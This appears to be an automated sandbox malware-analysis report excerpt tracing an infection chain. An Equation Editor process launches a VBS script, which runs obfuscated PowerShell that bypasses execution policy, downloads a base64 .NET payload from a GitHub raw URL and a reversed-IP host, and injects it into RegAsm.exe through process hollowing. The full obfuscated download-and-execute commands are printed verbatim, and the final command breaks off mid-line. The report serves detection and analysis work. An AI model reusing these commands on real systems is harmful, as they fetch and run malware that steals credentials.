                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 920Thread sleep count: 234 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 920Thread sleep time: -117000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744Thread sleep count: 127 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744Thread sleep time: -381000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2448Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744Thread sleep count: 9351 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2744Thread sleep time: -28053000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2036Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3188Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00443355 mov eax, dword ptr fs:[00000030h]13_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10004AB4 mov eax, dword ptr fs:[00000030h]13_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,13_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434BD8 SetUnhandledExceptionFilter,13_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Contains functionality to inject code into remote processes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,13_2_0041812A
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419662 mouse_event,13_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkfttdhjjbkddjhzlumjvc0vqukvmzvjftknfkvsxldndkydyjy1kb2lujycpicgokcd7mn0nkyd1cicrj2wnkycgpsb7jysnmx0nkydodccrj3qnkydwjysnczovlycrj3inkydhjysndy5naxrojysndwj1c2vyy29udgvudc4nkydjjysnb20vticrj29ezxrly3rpjysnbi8nkydojysnb0rldgunkydjjysnde9ulycrj3inkydlznmnkycvagvhzhmvbwenkydpbi8nkydezxrhjysnae5vdggtjysnvi50jysnehr7mx07ihsyfwjhc2unkyc2nenvbnrlbnqgpsaotmv3lu9ijysnamvjdcbtexn0zw0nkycujysntmv0llcnkydlyknsawvudckurg8nkyd3bmxvywrtdhjpjysnbmcoezj9dxjsktsnkycgezinkyd9ymluyxinkyd5q29udgvudca9ifttexn0zw0ujysnq29udmunkydydf06okzyjysnb21cyscrj3nlnjrtjysndccrj3jpbmcoezj9ymfzzty0q29udgunkydudck7ihsyfwfzc2vtymx5id0gjysnw1jlzmxljysny3rpbycrj24uqxnzzw1ibhldojpmjysnb2fkkhsyjysnfwjpjysnbmenkydyjysneumnkydvbnrljysnbnqpoybbjysnzg5sjysnawiujysnsu8ujysnsg9tjysnzv06oicrj1ynkydbsscrjygnkyd7mh10eccrj3quqycrj0zeuicrj1jxlycrjza4lzc3ms42jysnos40mzeumtkvlzpwdccrj3roezb9lcb7mh1kzxnhdgl2jysnywrveycrjzb9jysnlcb7mh1kzxnhjysndgl2ywrveycrjzb9lccrjyb7mh1kzxnhdgl2jysnywrvezankyd9lcb7mh0nkydszwdbcycrj217mh0nkycsihsnkycwjysnfscrj3snkycwfsx7mh17mccrj30pjykglwygiftdaefyxtm0lftdaefyxtm5lftdaefyxtm2ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', 